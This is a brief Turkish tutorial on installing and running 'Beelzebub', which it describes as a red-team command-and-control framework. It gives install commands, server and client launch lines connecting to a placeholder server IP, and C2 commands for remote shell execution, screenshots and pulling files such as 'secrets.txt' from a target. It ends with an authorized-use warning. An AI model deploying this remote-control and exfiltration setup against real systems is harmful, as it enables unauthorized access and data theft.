Beelzebub Aracı Nedir ve Nasıl Kullanılır?

# 😈 Beelzebub Nedir?

Beelzebub, bir Red Team Command & Control (C2) framework'üdür. Uzaktan yönetilen istemciler (beacon'lar) üzerinden sistem kontrolü sağlamak, komut çalıştırmak, bilgi toplamak ve veri sızdırmak amacıyla kullanılır. Geliştirici: klezVirus (https://github.com/klezVirus/Beelzebub)

# 🎯 Özellikleri

- Gelişmiş C2 mimarisi  
- Cross-platform istemci desteği (Linux, Windows, macOS)  
- TCP, HTTP/S veya DNS üzerinden iletişim  
- AES-256 şifreli bağlantı  
- Komut çalıştırma, dosya transferi, ekran görüntüsü alma  
- Python tabanlıdır

# ⚙️ Kurulum (Kali Linux)

1. Python ve bağımlılıkları kur:  
sudo apt update  
sudo apt install python3 python3-pip git -y  
metin, ekran görüntüsü, yazı tipi, grafik içeren bir resim

Yapay zeka tarafından oluşturulmuş içerik yanlış olabilir.

2. Beelzebub’u indir:  
git clone https://github.com/klezVirus/Beelzebub.git  
cd Beelzebub  
metin, ekran görüntüsü, yazı tipi, grafik içeren bir resim

Yapay zeka tarafından oluşturulmuş içerik yanlış olabilir.  
  
3. Gereken kütüphaneleri yükle:  
pip3 install -r requirements.txt  
ekran görüntüsü, metin, yazı tipi, grafik içeren bir resim

Yapay zeka tarafından oluşturulmuş içerik yanlış olabilir.

# ▶️ Kullanım

Server başlatma:  
python3 Beelzebub.py --server --port 4444  
ekran görüntüsü, yazı tipi, metin, grafik içeren bir resim

Yapay zeka tarafından oluşturulmuş içerik yanlış olabilir.  
İstemci çalıştırma:  
python3 Beelzebub.py --client --host <SERVER\_IP> --port 4444  
metin, ekran görüntüsü, yazı tipi içeren bir resim

Yapay zeka tarafından oluşturulmuş içerik yanlış olabilir.  
Komutlar:  
- `shell whoami` → Hedef sistemde komut çalıştırır  
- `screenshot` → Ekran görüntüsü alır  
- `upload file.txt` → Hedefe dosya gönderir  
- `download secrets.txt` → Hedeften dosya çeker

# 📟 Örnek Terminal Çıktısı

metin, ekran görüntüsü, yazı tipi içeren bir resim

Yapay zeka tarafından oluşturulmuş içerik yanlış olabilir.

# ⚠️ Dikkat

- Bu araç yalnızca izinli ve yasal test ortamlarında kullanılmalıdır.  
- Gerçek sistemlerde izinsiz kullanımı suç teşkil eder.